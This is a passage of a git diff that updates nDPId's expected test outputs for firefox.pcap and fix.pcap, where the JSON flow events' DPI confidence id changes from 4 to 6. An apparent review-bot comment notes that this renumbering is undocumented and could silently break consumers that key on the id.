+00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","packets-captured":5441,"packets-processed":5441,"total-skipped-flows":0,"total-l4-payload-len":4593506,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620927999948} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5441/5441 @@ -51,9 +51,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6044988 bytes -~~ total memory freed........: 6044988 bytes -~~ total allocations/frees...: 123593/123593 +~~ total memory allocated....: 6178622 bytes +~~ total memory freed........: 6178622 bytes +~~ total allocations/frees...: 126355/126355 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 921 chars diff --git a/test/results/fix.pcap.out b/test/results/fix.pcap.out index ef3e59c12..107868cd6 100644 --- a/test/results/fix.pcap.out +++ b/test/results/fix.pcap.out 
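Review bot: The numeric id inside `ndpi.confidence` is part of the emitted event format, and every changed line of the firefox.pcap.out hunk at `@@ -30,18 +30,18 @@` moves it from `{"4":"DPI"}` to `{"6":"DPI"}` with nothing in the commit record saying so. The same change is visible in the lines before this hunk and in the fix.pcap.out hunk that follows, which suggests the libnDPI bump renumbered its confidence values. A consumer or detection rule that keys on the id rather than the name would presumably stop matching without any error. I would add a line to the commit description such as `NOTE: ndpi.confidence id for "DPI" changed from 4 to 6; consumers should match on the name, not the id`. The fixture itself is regenerated output and needs no change.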
@@ -2,76 +2,76 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1493755109242} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="} 
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"} 
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
